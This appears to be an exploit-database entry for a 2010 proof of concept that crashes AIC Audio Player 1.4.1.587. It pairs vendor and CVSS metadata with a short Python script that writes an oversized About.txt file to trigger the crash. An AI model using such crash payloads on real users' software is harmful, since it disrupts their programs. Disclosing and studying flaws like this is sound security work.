header-logo
Suggest Exploit
vendor:
AIC Audio Player
by:
b0telh0
7,8
CVSS
HIGH
Local Crash
N/A
CWE
Product Name: AIC Audio Player
Affected Version From: 1.4.1.587
Affected Version To: 1.4.1.587
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

AIC Audio Player 1.4.1.587 Local Crash PoC

AIC Audio Player 1.4.1.587 is vulnerable to a local crash when a specially crafted About.txt file is copied to the AudioPlayer folder and the AICAudioPlayer is run and the About button is clicked.

Mitigation:

N/A
Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Title: AIC Audio Player 1.4.1.587 Local Crash PoC
# Date: 01-26-2010
# Author: b0telh0
# Link: http://www.aic-media.com/Download/Setup_AICAudioPlayer.exe
# Tested on: Windows XP SP3

# I couldn't even debug it. There's some anti-debugging protection...
# Tried !hidedebug from immunity debugger too...
# So, i'm not sure if we have more than just a crash!
# If someone have any advice, it would be cool learning about
anti-debugging techniques.


crash = "\x41" * 100

try:
file = open('About.txt','w');
file.write(crash);
file.close();
print "[+] Created About.txt file.\n"
print "[+] Copy it to AudioPlayer folder...\n"
print "[+] Run AICAudioPlayer and hit About!"
except:
print "[-] Error cant write file to system."